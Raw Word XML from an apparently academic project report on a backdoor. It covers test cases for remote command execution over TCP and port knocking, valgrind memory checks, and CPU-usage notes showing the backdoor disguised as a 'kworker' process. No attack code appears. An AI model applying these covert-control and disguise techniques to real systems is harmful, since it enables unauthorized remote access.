              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave can execute commands from Controller via TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark, Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Over a period of time, the Slave will output results to console and send via TCP to Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Controller can receive command results from Slave after execution through TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark, Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Console will output the commands executed by the Slave.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>When a connection is requested, the Controller is able to recognize the port knocking sequence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Wireshark, Terminal, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>iptables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If port knocking sequence is valid, the connection will be granted. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="h.cazjewhk901z" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="h.51jqghkdkp7o" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="h.thxo1femxjv9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="43" w:name="_Toc405739271"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:t>Evidence &amp; Observations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="h.93kp08oeaj9j" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="45" w:name="_Toc405739272"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:t>Programs do not have any memory leaks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">We ran the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Valgrind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command to check for memory leaks in the backdoor application:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:ind w:left="720" w:right="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>valgrind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> --tool=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>memcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> --leak-check=yes --show-reachable=yes --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-callers=20 --track-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>=yes ./[application name]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">This was the result from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Valgrind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with respect to the backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1612900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="image40.png" descr="Screenshot from 2014-12-06 12:33:35.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image40.png" descr="Screenshot from 2014-12-06 12:33:35.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1612900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note that “still reachable” has 13,500 bytes of memory lost. However, this is acceptable because the memory “loss” is due to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libpcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inotify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> libraries, which we are assuming to have their own memory allocation management.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Similar results are shown from the Controller application when we ran it against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Valgrind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="160020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943600" cy="1600200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This confirms that our applications are sufficiently managing memory allocation and that there are no significant memory leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="h.m8hanf48s2w5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="47" w:name="_Toc405739273"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:t>Programs are not intensive for machines to run</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is a screenshot of the backdoor application running on the Slave machine with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> running. Note how the CPU usage on the second core is at 100%. This is due to the fact that the backdoor is intently listening for any communication from the Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1816100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="image31.png" descr="Screenshot from 2014-12-06 12:43:24.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image31.png" descr="Screenshot from 2014-12-06 12:43:24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1816100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>However, once it receives a file monitoring command or a command line argument from the Controller, the CPU usage drops drastically as shown in the next screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4729163" cy="2584366"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="image72.png" descr="Screenshot from 2014-12-06 12:44:04.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image72.png" descr="Screenshot from 2014-12-06 12:44:04.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4729163" cy="2584366"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Regardless, once it finishes its job and goes back into “listening” mode, the CPU usage is back up nearly 50% on the third core and our “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kworker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” process is back to 99.5% CPU usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5231456" cy="1633538"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46" name="image99.png" descr="Screenshot from 2014-12-06 12:44:38.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image99.png" descr="Screenshot from 2014-12-06 12:44:38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5231456" cy="1633538"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>On the Controller application, there are a few fluctuations in the CPU usage, but nothing too drastic to warrant a full pin on the core:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22"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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unfortunately, our program fails in the area of minimal CPU usage. We have addressed this issue and discussed some remedies for it in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Project Limitations and Future Implementations </w:t>
      </w:r>
      <w:r>
        <w:t>section of this report.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="h.odgy90iaxo84" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="49" w:name="_Toc405739274"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:t>Basic firewall implementations on Controller</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>In the following screenshot, the current firewall settings are set to allow all traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3357563" cy="1315334"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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21"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3357563" cy="1315334"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>After we run the following command, we configure the firewall to accept essential traffic, such as DNS, HTTP and ICMP, while dropping other traffic. Refer to the following screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52"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22"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1676400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
